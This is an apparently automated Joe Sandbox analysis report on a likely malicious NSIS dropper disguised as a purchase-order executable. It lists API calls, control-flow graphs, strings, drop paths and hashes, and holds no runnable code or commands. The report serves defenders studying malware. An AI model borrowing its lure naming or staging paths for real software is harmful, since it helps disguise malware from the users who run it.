402513 5335->5336 5337 40403a 5338 404050 5337->5338 5343 40415c 5337->5343 5341 403ef1 19 API calls 5338->5341 5339 4041cb 5340 40429f 5339->5340 5342 4041d5 GetDlgItem 5339->5342 5348 403f58 8 API calls 5340->5348 5344 4040a6 5341->5344 5345 4041eb 5342->5345 5346 40425d 5342->5346 5343->5339 5343->5340 5347 4041a0 GetDlgItem SendMessageA 5343->5347 5349 403ef1 19 API calls 5344->5349 5345->5346 5353 404211 6 API calls 5345->5353 5346->5340 5350 40426f 5346->5350 5368 403f13 KiUserCallbackDispatcher 5347->5368 5358 40429a 5348->5358 5352 4040b3 CheckDlgButton 5349->5352 5354 404275 SendMessageA 5350->5354 5355 404286 5350->5355 5366 403f13 KiUserCallbackDispatcher 5352->5366 5353->5346 5354->5355 5355->5358 5359 40428c SendMessageA 5355->5359 5356 4041c6 5360 4042c4 SendMessageA 5356->5360 5359->5358 5360->5339 5361 4040d1 GetDlgItem 5367 403f26 SendMessageA 5361->5367 5363 4040e7 SendMessageA 5364 404105 GetSysColor 5363->5364 5365 40410e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5363->5365 5364->5365 5365->5358 5366->5361 5367->5363 5368->5356 4748 40173e 4749 402a3a 18 API calls 4748->4749 4750 401745 4749->4750 4751 4059ae 2 API calls 4750->4751 4752 40174c 4751->4752 4753 4059ae 2 API calls 4752->4753 4753->4752 5369 401ebe 5370 402a3a 18 API calls 5369->5370 5371 401ec5 5370->5371 5372 406010 2 API calls 5371->5372 5373 401ecb 5372->5373 5375 401edd 5373->5375 5376 405c6a wsprintfA 5373->5376 5376->5375 5377 40193f 5378 402a3a 18 API calls 5377->5378 5379 401946 lstrlenA 5378->5379 5380 402513 5379->5380

                                                                      Executed Functions

                                                                      Function 004030EC Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4030ec-403121 SetErrorMode GetVersion 1 403123-40312b call 4060a5 0->1 2 403134 0->2 1->2 7 40312d 1->7 4 403139-40314c call 406037 lstrlenA 2->4 9 40314e-4031c1 call 4060a5 * 2 #17 OleInitialize SHGetFileInfoA call 405d0c GetCommandLineA call 405d0c GetModuleHandleA 4->9 7->2 18 4031c3-4031c8 9->18 19 4031cd-4031e2 call 4057a9 CharNextA 9->19 18->19 22 4032a7-4032ab 19->22 23 4032b1 22->23 24 4031e7-4031ea 22->24 27 4032c4-4032de GetTempPathA call 4030bb 23->27 25 4031f2-4031fa 24->25 26 4031ec-4031f0 24->26 29 403202-403205 25->29 30 4031fc-4031fd 25->30 26->25 26->26 36 4032e0-4032fe GetWindowsDirectoryA lstrcatA call 4030bb 27->36 37 403336-403350 DeleteFileA call 402c66 27->37 31 403297-4032a4 call 4057a9 29->31 32 40320b-40320f 29->32 30->29 31->22 51 4032a6 31->51 34 403211-403217 32->34 35 403227-403254 32->35 39 403219-40321b 34->39 40 40321d 34->40 41 403256-40325c 35->41 42 403267-403295 35->42 36->37 53 403300-403330 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 36->53 54 4033e4-4033f4 call 4035b2 OleUninitialize 37->54 55 403356-40335c 37->55 39->35 39->40 40->35 46 403262 41->46 47 40325e-403260 41->47 42->31 49 4032b3-4032bf call 405d0c 42->49 46->42 47->42 47->46 49->27 51->22 53->37 53->54 65 403518-40351e 54->65 66 4033fa-40340a call 405502 ExitProcess 54->66 58 4033d4-4033db call 40368c 55->58 59 40335e-403369 call 4057a9 55->59 67 4033e0 58->67 68 40336b-403394 59->68 69 40339f-4033a9 59->69 71 403520-403539 GetCurrentProcess OpenProcessToken 65->71 72 40359a-4035a2 65->72 67->54 73 403396-403398 68->73 76 403410-403424 call 405485 lstrcatA 69->76 77 4033ab-4033b8 call 40586c 69->77 79 40356b-403579 call 4060a5 71->79 80 40353b-403565 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035a4 72->74 75 4035a8-4035ac ExitProcess 72->75 73->69 81 40339a-40339d 73->81 74->75 89 403431-40344b lstrcatA lstrcmpiA 76->89 90 403426-40342c lstrcatA 76->90 77->54 88 4033ba-4033d0 call 405d0c * 2 77->88 91 403587-403591 ExitWindowsEx 79->91 92 40357b-403585 79->92 80->79 81->69 81->73 88->58 89->54 95 40344d-403450 89->95 90->89 91->72 93 403593-403595 call 40140b 91->93 92->91 92->93 93->72 98 403452-403457 call 4053eb 95->98 99 403459 call 405468 95->99 104 40345e-40346b SetCurrentDirectoryA 98->104 99->104 107 403478-4034a0 call 405d0c 104->107 108 40346d-403473 call 405d0c 104->108 112 4034a6-4034c2 call 405d2e DeleteFileA 107->112 108->107 115 403503-40350a 112->115 116 4034c4-4034d4 CopyFileA 112->116 115->112 117 40350c-403513 call 405bc7 115->117 116->115 118 4034d6-4034f6 call 405bc7 call 405d2e call 40549d 116->118 117->54 118->115 127 4034f8-4034ff CloseHandle 118->127 127->115
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 00403111
                                                                      • GetVersion.KERNEL32 ref: 00403117
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                      • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                      • OleInitialize.OLE32(00000000), ref: 00403169
                                                                      • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                      • GetCommandLineA.KERNEL32(Regangen Setup,NSIS Error), ref: 0040319A
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000000), ref: 004031AD
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000020), ref: 004031D8
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032E6
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F2
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403306
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330E
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040331F
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403327
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 0040333B
                                                                        • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                        • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                      • OleUninitialize.OLE32(?), ref: 004033E9
                                                                      • ExitProcess.KERNEL32 ref: 0040340A
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                      • ExitProcess.KERNEL32 ref: 004035AC
                                                                        • Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                      • String ID: "$"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe$Error launching installer$Low$NSIS Error$Regangen Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KXu$~nsu
                                                                      • API String ID: 3329125770-3841515056
                                                                      • Opcode ID: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                      • Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
                                                                      • Opcode Fuzzy Hash: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                      • Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E
                                                                      Function 00405063 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 128 405063-40507f 129 405085-40514c GetDlgItem * 3 call 403f26 call 4047c3 GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 40520e-405214 128->130 152 40516a-40516d 129->152 153 40514e-405168 SendMessageA * 2 129->153 132 405216-405238 GetDlgItem CreateThread CloseHandle 130->132 133 40523e-40524a 130->133 132->133 135 40526c-405272 133->135 136 40524c-405252 133->136 137 405274-40527a 135->137 138 4052c7-4052ca 135->138 140 405254-405267 ShowWindow * 2 call 403f26 136->140 141 40528d-405294 call 403f58 136->141 142 4052a0-4052b0 ShowWindow 137->142 143 40527c-405288 call 403eca 137->143 138->141 146 4052cc-4052d2 138->146 140->135 149 405299-40529d 141->149 150 4052c0-4052c2 call 403eca 142->150 151 4052b2-4052bb call 404f25 142->151 143->141 146->141 154 4052d4-4052e7 SendMessageA 146->154 150->138 151->150 157 40517d-405194 call 403ef1 152->157 158 40516f-40517b SendMessageA 152->158 153->152 159 4053e4-4053e6 154->159 160 4052ed-405319 CreatePopupMenu call 405d2e AppendMenuA 154->160 167 405196-4051aa ShowWindow 157->167 168 4051ca-4051eb GetDlgItem SendMessageA 157->168 158->157 159->149 165 40531b-40532b GetWindowRect 160->165 166 40532e-405344 TrackPopupMenu 160->166 165->166 166->159 169 40534a-405364 166->169 170 4051b9 167->170 171 4051ac-4051b7 ShowWindow 167->171 168->159 172 4051f1-405209 SendMessageA * 2 168->172 173 405369-405384 SendMessageA 169->173 174 4051bf-4051c5 call 403f26 170->174 171->174 172->159 173->173 175 405386-4053a6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 4053a8-4053c8 SendMessageA 175->177 177->177 178 4053ca-4053de GlobalUnlock SetClipboardData CloseClipboard 177->178 178->159
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                      • GetClientRect.USER32(?,?), ref: 0040510E
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                      • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                        • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405238
                                                                      • ShowWindow.USER32(00000000), ref: 0040525B
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                      • ShowWindow.USER32(00000008), ref: 004052A8
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                      • CreatePopupMenu.USER32 ref: 004052ED
                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                      • OpenClipboard.USER32(00000000), ref: 00405387
                                                                      • EmptyClipboard.USER32 ref: 0040538D
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                      • CloseClipboard.USER32 ref: 004053DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: @y
                                                                      • API String ID: 590372296-2793234042
                                                                      • Opcode ID: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                      • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                      • Opcode Fuzzy Hash: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                      • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69
                                                                      Function 00405D2E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 423 405d2e-405d39 424 405d3b-405d4a 423->424 425 405d4c-405d61 423->425 424->425 426 405f54-405f58 425->426 427 405d67-405d72 425->427 428 405d84-405d8e 426->428 429 405f5e-405f68 426->429 427->426 430 405d78-405d7f 427->430 428->429 433 405d94-405d9b 428->433 431 405f73-405f74 429->431 432 405f6a-405f6e call 405d0c 429->432 430->426 432->431 435 405da1-405dd6 433->435 436 405f47 433->436 437 405ef1-405ef4 435->437 438 405ddc-405de7 GetVersion 435->438 439 405f51-405f53 436->439 440 405f49-405f4f 436->440 441 405f24-405f27 437->441 442 405ef6-405ef9 437->442 443 405e01 438->443 444 405de9-405ded 438->444 439->426 440->426 449 405f35-405f45 lstrlenA 441->449 450 405f29-405f30 call 405d2e 441->450 446 405f09-405f15 call 405d0c 442->446 447 405efb-405f07 call 405c6a 442->447 448 405e08-405e0f 443->448 444->443 445 405def-405df3 444->445 445->443 451 405df5-405df9 445->451 461 405f1a-405f20 446->461 447->461 453 405e11-405e13 448->453 454 405e14-405e16 448->454 449->426 450->449 451->443 457 405dfb-405dff 451->457 453->454 459 405e18-405e3b call 405bf3 454->459 460 405e4f-405e52 454->460 457->448 472 405e41-405e4a call 405d2e 459->472 473 405ed8-405edc 459->473 464 405e62-405e65 460->464 465 405e54-405e60 GetSystemDirectoryA 460->465 461->449 463 405f22 461->463 469 405ee9-405eef call 405f77 463->469 466 405e67-405e75 GetWindowsDirectoryA 464->466 467 405ecf-405ed1 464->467 470 405ed3-405ed6 465->470 466->467 467->470 471 405e77-405e81 467->471 469->449 470->469 470->473 475 405e83-405e86 471->475 476 405e9b-405eb1 SHGetSpecialFolderLocation 471->476 472->470 473->469 478 405ede-405ee4 lstrcatA 473->478 475->476 480 405e88-405e8f 475->480 481 405eb3-405eca SHGetPathFromIDListA CoTaskMemFree 476->481 482 405ecc 476->482 478->469 484 405e97-405e99 480->484 481->470 481->482 482->467 484->470 484->476
                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000), ref: 00405DDF
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
                                                                      • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
                                                                      • CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                      • lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000), ref: 00405F36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-118236429
                                                                      • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                      • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                      • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                      • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                      Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                      • String ID:
                                                                      • API String ID: 4227406936-0
                                                                      • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                      • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                      Function 004055AE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 685 4055ae-4055d4 call 40586c 688 4055d6-4055e8 DeleteFileA 685->688 689 4055ed-4055f4 685->689 690 405777-40577b 688->690 691 4055f6-4055f8 689->691 692 405607-405617 call 405d0c 689->692 693 405725-40572a 691->693 694 4055fe-405601 691->694 698 405626-405627 call 4057c5 692->698 699 405619-405624 lstrcatA 692->699 693->690 697 40572c-40572f 693->697 694->692 694->693 700 405731-405737 697->700 701 405739-405741 call 406010 697->701 702 40562c-40562f 698->702 699->702 700->690 701->690 708 405743-405757 call 40577e call 405566 701->708 706 405631-405638 702->706 707 40563a-405640 lstrcatA 702->707 706->707 709 405645-405663 lstrlenA FindFirstFileA 706->709 707->709 723 405759-40575c 708->723 724 40576f-405772 call 404f25 708->724 711 405669-405680 call 4057a9 709->711 712 40571b-40571f 709->712 719 405682-405686 711->719 720 40568b-40568e 711->720 712->693 714 405721 712->714 714->693 719->720 725 405688 719->725 721 405690-405695 720->721 722 4056a1-4056af call 405d0c 720->722 726 405697-405699 721->726 727 4056fa-40570c FindNextFileA 721->727 735 4056b1-4056b9 722->735 736 4056c6-4056d1 call 405566 722->736 723->700 729 40575e-40576d call 404f25 call 405bc7 723->729 724->690 725->720 726->722 731 40569b-40569f 726->731 727->711 733 405712-405715 FindClose 727->733 729->690 731->722 731->727 733->712 735->727 738 4056bb-4056c4 call 4055ae 735->738 745 4056f2-4056f5 call 404f25 736->745 746 4056d3-4056d6 736->746 738->727 745->727 748 4056d8-4056e8 call 404f25 call 405bc7 746->748 749 4056ea-4056f0 746->749 748->727 749->727
                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055D7
                                                                      • lstrcatA.KERNEL32(Frbids.tal,\*.*,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040561F
                                                                      • lstrcatA.KERNEL32(?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405640
                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405646
                                                                      • FindFirstFileA.KERNELBASE(Frbids.tal,?,?,?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405657
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                      • FindClose.KERNEL32(00000000), ref: 00405715
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
